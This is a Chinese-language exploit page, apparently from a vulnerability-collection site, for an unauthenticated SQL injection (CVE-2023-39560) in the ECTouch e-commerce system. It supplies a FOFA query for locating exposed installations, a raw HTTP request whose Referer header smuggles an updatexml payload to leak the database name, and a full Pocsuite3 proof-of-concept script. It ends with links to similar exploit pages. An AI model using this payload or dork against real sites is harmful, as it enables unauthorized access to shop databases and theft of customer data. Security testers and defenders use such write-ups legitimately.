E2-1ECTouch-电商微信小程序-SQL

漏洞描述：

ECTouch 电商系统 /ectouch-main/include/apps/default/helpers/insert.php 文件中第285行的 insert_bought_notes 函数中，传入的 $arr['id'] 参数未进行验证和过滤，导致未经身份验证的攻击者利用该漏洞进行SQL 注入,获取数据库敏感信息。

网络测绘:

fofa语法：

FOFA：“themes/default/statics/css/ectouch.css”

漏洞复现:

payload：

GET /index.php?m=default&c=user&a=register&u=0 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Referer: 554fcae493e564ee0dc75bdf2ebf94cabought_notes|a:1:{s:2:"id";s:49:"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#";}

效果图:
查询当前数据库

Pocsuite脚本

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE, logger, OptDict
from pocsuite3.api import get_listener_ip, get_listener_port
from urllib.parse import urlparse, urljoin
from pocsuite3.lib.utils import random_str
from collections import OrderedDict
import re


class DemoPOC(POCBase):
    version = '1.0'
    author = ['OidBoy']
    vulDate = '2023-08-28'
    createDate = '2024-01-18'
    updateDate = '2024-01-18'
    references = ['https://nvd.nist.gov/vuln/detail/CVE-2023-39560']
    name = 'ECTouch_ECTouch_未授权_SQL注入漏洞(CVE-2023-39560)'
    appPowerLink = 'https://github.com/ectouch/ectouch'
    appName = 'ECTouch'
    appVersion = 'v2'
    vulType = 'SQL Injection'
    desc = '''ECTouch v2 被发现通过 \\default\\helpers\\insert.php 中的 $arr['id'] 参数包含 SQL 注入漏洞。'''
    samples = []


    def _verify(self):
        result = {}
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0",
            "Referer": '554fcae493e564ee0dc75bdf2ebf94cabought_notes|a:1:{s:2:"id";s:49:"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#";}'
        }
        vulurl = self.url + f'/index.php?m=default&c=user&a=register&u=0'
        resp = requests.get(vulurl, headers=headers, verify=False, allow_redirects=False)
        match = re.search('XPATH syntax error: \'~(.*)~\'',resp.text)
        if  resp.status_code == 200 and match:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

register_poc(DemoPOC)

Menu

Share

E2-1ECTouch-电商微信小程序-SQL

E2-1ECTouch-电商微信小程序-SQL

漏洞描述：

网络测绘:

fofa语法：

漏洞复现:

Comment

Z22-1正方-移动信息服务管理系统-任意文件上传

Z20-1ZoneMinder--SQL

Z17-2紫光-电子档案管理系统-InformationLeakage

P5-2平升-电子水库监测管理平台-SQL

M3-2明源云-ERP系统接口管家-任意文件上传

用友U8Cloud-RepAddToTaskAction-SQL注入

蓝凌OAsysUiComponent未授权复制

Q14-1群杰-印章物联网管理平台-PermissionAC

Y4-21用友-NC-XXE

泛微ecology-v9-ModeDateService-SQL注入